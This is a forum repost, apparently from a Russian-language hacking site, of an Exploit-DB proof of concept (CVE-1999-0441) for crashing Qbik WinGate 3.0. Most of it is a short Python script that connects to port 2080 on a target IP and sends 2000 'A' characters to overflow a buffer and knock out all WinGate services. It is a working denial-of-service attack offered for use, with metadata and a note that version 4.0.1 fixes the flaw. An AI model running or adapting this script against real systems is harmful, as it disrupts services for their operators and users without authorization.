Exploit Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow (Denial of Service) (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19410
Проверка EDB
  1. Пройдено
Автор
PRIZM
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-1999-0441
Дата публикации
1999-02-22
Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow (Denial of Service) (PoC)
Код:
source: https://www.securityfocus.com/bid/509/info

WinGate's Winsock redirector service is susceptible to a buffer overflow vilnerability that will crash all WinGate services.

#!/usr/bin/python
#
# Qbik Wingate 3.0 DoS Proof of Concept Code.
# Vulnerability Discovered by eEye Digital Security
Team(http://www.eEye.com)
# Simple Script by Prizm([email protected])
# 
# By connecting to port 2080 on a system running Qbik Wingate 3.0 and
# sending 2000
# characters, all wingate services will crash.
# *Solution* Upgrade to 4.0.1, version is not vulnerable to this Denial of
# Service attack. 
#
# This *simple* little script will crash all wingate services.


import socket
import sys
from string import strip

host="xxx.xxx.xxx.xxx" # Replace x's with IP.
port=2080
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:
  s.connect(host,port)
  print "connection succeeded."
except socket.error, e:
  print "connection failed, " + e.args

s.send("A" * 2000)

#end
 
Источник
www.exploit-db.com

Похожие темы